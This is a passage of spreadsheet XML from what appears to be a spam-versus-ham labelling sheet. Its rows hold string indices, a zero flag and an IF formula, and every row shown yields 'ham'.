    <row r="2071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2071" t="s">
        <v>1547</v>
      </c>
      <c r="B2071">
        <v>0</v>
      </c>
      <c r="C2071" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2072" t="s">
        <v>1548</v>
      </c>
      <c r="B2072">
        <v>0</v>
      </c>
      <c r="C2072" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2073" t="s">
        <v>1549</v>
      </c>
      <c r="B2073">
        <v>0</v>
      </c>
      <c r="C2073" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2074" t="s">
        <v>1550</v>
      </c>
      <c r="B2074">
        <v>0</v>
      </c>
      <c r="C2074" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2075" t="s">
        <v>1551</v>
      </c>
      <c r="B2075">
        <v>0</v>
      </c>
      <c r="C2075" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2076" t="s">
        <v>1552</v>
      </c>
      <c r="B2076">
        <v>0</v>
      </c>
      <c r="C2076" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2077" t="s">
        <v>1553</v>
      </c>
      <c r="B2077">
        <v>0</v>
      </c>
      <c r="C2077" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2078" t="s">
        <v>1554</v>
      </c>
      <c r="B2078">
        <v>0</v>
      </c>
      <c r="C2078" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2079" t="s">
        <v>1555</v>
      </c>
      <c r="B2079">
        <v>0</v>
      </c>
      <c r="C2079" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2080" t="s">
        <v>1556</v>
      </c>
      <c r="B2080">
        <v>0</v>
      </c>
      <c r="C2080" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2081" t="s">
        <v>1557</v>
      </c>
      <c r="B2081">
        <v>0</v>
      </c>
      <c r="C2081" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2082" t="s">
        <v>1558</v>
      </c>
      <c r="B2082">
        <v>0</v>
      </c>
      <c r="C2082" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2083" t="s">
        <v>1559</v>
      </c>
      <c r="B2083">
        <v>0</v>
      </c>
      <c r="C2083" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2084" t="s">
        <v>1560</v>
      </c>
      <c r="B2084">
        <v>0</v>
      </c>
      <c r="C2084" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2085" t="s">
        <v>1561</v>
      </c>
      <c r="B2085">
        <v>0</v>
      </c>
      <c r="C2085" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2086" t="s">
        <v>1562</v>
      </c>
      <c r="B2086">
        <v>0</v>
      </c>
      <c r="C2086" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2087" t="s">
        <v>1563</v>
      </c>
      <c r="B2087">
        <v>0</v>
      </c>
      <c r="C2087" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2088" t="s">
        <v>1564</v>
      </c>
      <c r="B2088">
        <v>0</v>
      </c>
      <c r="C2088" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2089" t="s">
        <v>1565</v>
      </c>
      <c r="B2089">
        <v>0</v>
      </c>
      <c r="C2089" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2090" t="s">
        <v>1566</v>
      </c>
      <c r="B2090">
        <v>0</v>
      </c>
      <c r="C2090" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2091" t="s">
        <v>1567</v>
      </c>
      <c r="B2091">
        <v>0</v>
      </c>
      <c r="C2091" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2092" t="s">
        <v>1568</v>
      </c>
      <c r="B2092">
        <v>0</v>
      </c>
      <c r="C2092" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2093" t="s">
        <v>1569</v>
      </c>
      <c r="B2093">
        <v>0</v>
      </c>
      <c r="C2093" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2094" t="s">
        <v>1570</v>
      </c>
      <c r="B2094">
        <v>0</v>
      </c>
      <c r="C2094" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2095" t="s">
        <v>1571</v>
      </c>
      <c r="B2095">
        <v>0</v>
      </c>
      <c r="C2095" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2096" t="s">
        <v>1572</v>
      </c>
      <c r="B2096">
        <v>0</v>
      </c>
      <c r="C2096" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2097" t="s">
        <v>1573</v>
      </c>
      <c r="B2097">
        <v>0</v>
      </c>
      <c r="C2097" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2098" t="s">
        <v>1574</v>
      </c>
      <c r="B2098">
        <v>0</v>
      </c>
      <c r="C2098" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2099" t="s">
        <v>1575</v>
      </c>
      <c r="B2099">
        <v>0</v>
      </c>
      <c r="C2099" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2100" t="s">
        <v>1576</v>
      </c>
      <c r="B2100">
        <v>0</v>
      </c>
      <c r="C2100" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2101" t="s">
        <v>1577</v>
      </c>
      <c r="B2101">
        <v>0</v>
      </c>
      <c r="C2101" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2102" t="s">
        <v>1578</v>
      </c>
      <c r="B2102">
        <v>0</v>
      </c>
      <c r="C2102" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2103" t="s">
        <v>1579</v>
      </c>
      <c r="B2103">
        <v>0</v>
      </c>
      <c r="C2103" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2104" t="s">
        <v>1580</v>
      </c>
      <c r="B2104">
        <v>0</v>
      </c>
      <c r="C2104" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2105" t="s">
        <v>1581</v>
      </c>
      <c r="B2105">
        <v>0</v>
      </c>
      <c r="C2105" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2106" t="s">
        <v>1582</v>
      </c>
      <c r="B2106">
        <v>0</v>
      </c>
      <c r="C2106" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2107" t="s">
        <v>1583</v>
      </c>
      <c r="B2107">
        <v>0</v>
      </c>
      <c r="C2107" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2108" t="s">
        <v>1584</v>
      </c>
      <c r="B2108">
        <v>0</v>
      </c>
      <c r="C2108" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2109" t="s">
        <v>1585</v>
      </c>
      <c r="B2109">
        <v>0</v>
      </c>
      <c r="C2109" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2110" t="s">
        <v>1586</v>
      </c>
      <c r="B2110">
        <v>0</v>
      </c>
      <c r="C2110" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2111" t="s">
        <v>1587</v>
      </c>
      <c r="B2111">
        <v>0</v>
      </c>
      <c r="C2111" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2112" t="s">
        <v>1588</v>
      </c>
      <c r="B2112">
        <v>0</v>
      </c>
      <c r="C2112" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2113" t="s">
        <v>1589</v>
      </c>
      <c r="B2113">
        <v>0</v>
      </c>
      <c r="C2113" t="str">
        <f t="shared" si="32"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2114" t="s">
        <v>1590</v>
      </c>
      <c r="B2114">
        <v>0</v>
      </c>
      <c r="C2114" t="str">
        <f t="shared" ref="C2114:C2177" si="33">IF(B2114="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2115" t="s">
        <v>1591</v>
      </c>
      <c r="B2115">
        <v>0</v>
      </c>
      <c r="C2115" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2116" t="s">
        <v>1592</v>
      </c>
      <c r="B2116">
        <v>0</v>
      </c>
      <c r="C2116" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2117" t="s">
        <v>1593</v>
      </c>
      <c r="B2117">
        <v>0</v>
      </c>
      <c r="C2117" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2118" t="s">
        <v>1594</v>
      </c>
      <c r="B2118">
        <v>0</v>
      </c>
      <c r="C2118" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2119" t="s">
        <v>1595</v>
      </c>
      <c r="B2119">
        <v>0</v>
      </c>
      <c r="C2119" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2120" t="s">
        <v>1596</v>
      </c>
      <c r="B2120">
        <v>0</v>
      </c>
      <c r="C2120" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2121" t="s">
        <v>1597</v>
      </c>
      <c r="B2121">
        <v>0</v>
      </c>
      <c r="C2121" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2122" t="s">
        <v>1598</v>
      </c>
      <c r="B2122">
        <v>0</v>
      </c>
      <c r="C2122" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2123" t="s">
        <v>1599</v>
      </c>
      <c r="B2123">
        <v>0</v>
      </c>
      <c r="C2123" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2124" t="s">
        <v>1600</v>
      </c>
      <c r="B2124">
        <v>0</v>
      </c>
      <c r="C2124" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2125" t="s">
        <v>1601</v>
      </c>
      <c r="B2125">
        <v>0</v>
      </c>
      <c r="C2125" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2126" t="s">
        <v>1602</v>
      </c>
      <c r="B2126">
        <v>0</v>
      </c>
      <c r="C2126" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2127" t="s">
        <v>1603</v>
      </c>
      <c r="B2127">
        <v>0</v>
      </c>
      <c r="C2127" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2128" t="s">
        <v>1604</v>
      </c>
      <c r="B2128">
        <v>0</v>
      </c>
      <c r="C2128" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2129" t="s">
        <v>1605</v>
      </c>
      <c r="B2129">
        <v>0</v>
      </c>
      <c r="C2129" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2130" t="s">
        <v>1606</v>
      </c>
      <c r="B2130">
        <v>0</v>
      </c>
      <c r="C2130" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2131" t="s">
        <v>1607</v>
      </c>
      <c r="B2131">
        <v>0</v>
      </c>
      <c r="C2131" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2132" t="s">
        <v>1608</v>
      </c>
      <c r="B2132">
        <v>0</v>
      </c>
      <c r="C2132" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2133" t="s">
        <v>1609</v>
      </c>
      <c r="B2133">
        <v>0</v>
      </c>
      <c r="C2133" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2134" t="s">
        <v>1610</v>
      </c>
      <c r="B2134">
        <v>0</v>
      </c>
      <c r="C2134" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2135" t="s">
        <v>1611</v>
      </c>
      <c r="B2135">
        <v>0</v>
      </c>
      <c r="C2135" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2136" t="s">
        <v>1612</v>
      </c>
      <c r="B2136">
        <v>0</v>
      </c>
      <c r="C2136" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2137" t="s">
        <v>1613</v>
      </c>
      <c r="B2137">
        <v>0</v>
      </c>
      <c r="C2137" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2138" t="s">
        <v>1614</v>
      </c>
      <c r="B2138">
        <v>0</v>
      </c>
      <c r="C2138" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2139" t="s">
        <v>1615</v>
      </c>
      <c r="B2139">
        <v>0</v>
      </c>
      <c r="C2139" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2140" t="s">
        <v>1616</v>
      </c>
      <c r="B2140">
        <v>0</v>
      </c>
      <c r="C2140" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2141" t="s">
        <v>1617</v>
      </c>
      <c r="B2141">
        <v>0</v>
      </c>
      <c r="C2141" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2142" t="s">
        <v>1618</v>
      </c>
      <c r="B2142">
        <v>0</v>
      </c>
      <c r="C2142" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2143" t="s">
        <v>1619</v>
      </c>
      <c r="B2143">
        <v>0</v>
      </c>
      <c r="C2143" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2144" t="s">
        <v>1620</v>
      </c>
      <c r="B2144">
        <v>0</v>
      </c>
      <c r="C2144" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2145" t="s">
        <v>1621</v>
      </c>
      <c r="B2145">
        <v>0</v>
      </c>
      <c r="C2145" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2146" t="s">
        <v>1622</v>
      </c>
      <c r="B2146">
        <v>0</v>
      </c>
      <c r="C2146" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2147" t="s">
        <v>1623</v>
      </c>
      <c r="B2147">
        <v>0</v>
      </c>
      <c r="C2147" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2148" t="s">
        <v>1624</v>
      </c>
      <c r="B2148">
        <v>0</v>
      </c>
      <c r="C2148" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2149" t="s">
        <v>1625</v>
      </c>
      <c r="B2149">
        <v>0</v>
      </c>
      <c r="C2149" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2150" t="s">
        <v>1626</v>
      </c>
      <c r="B2150">
        <v>0</v>
      </c>
      <c r="C2150" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2151" t="s">
        <v>1627</v>
      </c>
      <c r="B2151">
        <v>0</v>
      </c>
      <c r="C2151" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2152" t="s">
        <v>1628</v>
      </c>
      <c r="B2152">
        <v>0</v>
      </c>
      <c r="C2152" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2153" t="s">
        <v>1629</v>
      </c>
      <c r="B2153">
        <v>0</v>
      </c>
      <c r="C2153" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2154" t="s">
        <v>1630</v>
      </c>
      <c r="B2154">
        <v>0</v>
      </c>
      <c r="C2154" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2155" t="s">
        <v>1631</v>
      </c>
      <c r="B2155">
        <v>0</v>
      </c>
      <c r="C2155" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2156" t="s">
        <v>1632</v>
      </c>
      <c r="B2156">
        <v>0</v>
      </c>
      <c r="C2156" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2157" t="s">
        <v>1633</v>
      </c>
      <c r="B2157">
        <v>0</v>
      </c>
      <c r="C2157" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2158" t="s">
        <v>1634</v>
      </c>
      <c r="B2158">
        <v>0</v>
      </c>
      <c r="C2158" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2159" t="s">
        <v>1635</v>
      </c>
      <c r="B2159">
        <v>0</v>
      </c>
      <c r="C2159" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2160" t="s">
        <v>1636</v>
      </c>
      <c r="B2160">
        <v>0</v>
      </c>
      <c r="C2160" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2161" t="s">
        <v>1637</v>
      </c>
      <c r="B2161">
        <v>0</v>
      </c>
      <c r="C2161" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2162" t="s">
        <v>1638</v>
      </c>
      <c r="B2162">
        <v>0</v>
      </c>
      <c r="C2162" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2163" t="s">
        <v>1639</v>
      </c>
      <c r="B2163">
        <v>0</v>
      </c>
      <c r="C2163" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2164" t="s">
        <v>1640</v>
      </c>
      <c r="B2164">
        <v>0</v>
      </c>
      <c r="C2164" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2165" t="s">
        <v>1641</v>
      </c>
      <c r="B2165">
        <v>0</v>
      </c>
      <c r="C2165" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2166" t="s">
        <v>1642</v>
      </c>
      <c r="B2166">
        <v>0</v>
      </c>
      <c r="C2166" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2167" t="s">
        <v>1643</v>
      </c>
      <c r="B2167">
        <v>0</v>
      </c>
      <c r="C2167" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2168" t="s">
        <v>1644</v>
      </c>
      <c r="B2168">
        <v>0</v>
      </c>
      <c r="C2168" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2169" t="s">
        <v>1645</v>
      </c>
      <c r="B2169">
        <v>0</v>
      </c>
      <c r="C2169" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2170" t="s">
        <v>1646</v>
      </c>
      <c r="B2170">
        <v>0</v>
      </c>
      <c r="C2170" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2171" t="s">
        <v>1647</v>
      </c>
      <c r="B2171">
        <v>0</v>
      </c>
      <c r="C2171" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2172" t="s">
        <v>1648</v>
      </c>
      <c r="B2172">
        <v>0</v>
      </c>
      <c r="C2172" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2173" t="s">
        <v>1649</v>
      </c>
      <c r="B2173">
        <v>0</v>
      </c>
      <c r="C2173" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2174" t="s">
        <v>1650</v>
      </c>
      <c r="B2174">
        <v>0</v>
      </c>
      <c r="C2174" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2175" t="s">
        <v>1651</v>
      </c>
      <c r="B2175">
        <v>0</v>
      </c>
      <c r="C2175" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2176" t="s">
        <v>1652</v>
      </c>
      <c r="B2176">
        <v>0</v>
      </c>
      <c r="C2176" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2177" t="s">
        <v>1653</v>
      </c>
      <c r="B2177">
        <v>0</v>
      </c>
      <c r="C2177" t="str">
        <f t="shared" si="33"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2178" t="s">
        <v>1654</v>
      </c>
      <c r="B2178">
        <v>0</v>
      </c>
      <c r="C2178" t="str">
        <f t="shared" ref="C2178:C2241" si="34">IF(B2178="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2179" t="s">
        <v>1655</v>
      </c>
      <c r="B2179">
        <v>0</v>
      </c>
      <c r="C2179" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2180" t="s">
        <v>1656</v>
      </c>
      <c r="B2180">
        <v>0</v>
      </c>
      <c r="C2180" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2181" t="s">
        <v>1657</v>
      </c>
      <c r="B2181">
        <v>0</v>
      </c>
      <c r="C2181" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2182" t="s">
        <v>1658</v>
      </c>
      <c r="B2182">
        <v>0</v>
      </c>
      <c r="C2182" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2183" t="s">
